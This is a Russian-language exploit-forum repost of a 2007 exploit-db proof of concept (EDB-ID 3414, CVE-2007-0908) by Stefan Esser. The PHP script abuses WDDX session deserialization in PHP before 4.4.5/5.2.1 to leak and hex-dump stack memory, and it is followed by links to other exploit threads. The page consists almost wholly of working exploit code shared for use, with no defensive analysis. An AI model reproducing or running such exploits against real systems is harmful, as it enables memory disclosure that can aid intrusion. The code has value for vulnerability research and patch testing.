Exploit PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3414
Проверка EDB
  1. Пройдено
Автор
STEFAN ESSER
Тип уязвимости
LOCAL
Платформа
MULTIPLE
CVE
cve-2007-0908
Дата публикации
2007-03-04
PHP: 
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //       PHP WDDX Session Deserialization Stack Information Leak      //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  if (!extension_loaded("wddx")) {
    die("wddx extension needed\n");
  }

  ini_set("session.serialize_handler", "wddx");
  
  session_start();
  
  session_decode("<wddxPacket version='1.0'><header/><data><struct><var name='".str_repeat("A",8192)."'><string>A</string></var><var name='1'><string>1</string></var></struct></data></wddxPacket>");    

  $keys = array_keys($_SESSION);
  $stackdump = $keys[1];
  
  echo "Stackdump\n---------\n\n";
  
  for ($b=0; $b<strlen($stackdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($stackdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($stackdump[$b+$i]);
      if ($c > 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }
?>

# milw0rm.com [2007-03-04]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
Ответы
0
Просмотры
773
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sophos Web Appliance 4.3.1.1 - Session Fixation
Ответы
0
Просмотры
652
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
Ответы
0
Просмотры
685
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Github Enterprise - Default Session Secret and Deserialization (Metasploit)
Ответы
0
Просмотры
650
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit FTPShell Client 6.53 - 'Session name' Local Buffer Overflow
Ответы
0
Просмотры
741
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)
Ответы
0
Просмотры
629
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Ответы
0
Просмотры
656
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Ответы
0
Просмотры
613
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)
Ответы
0
Просмотры
490
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Aztech Modem Routers - Session Hijacking
Ответы
0
Просмотры
502
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу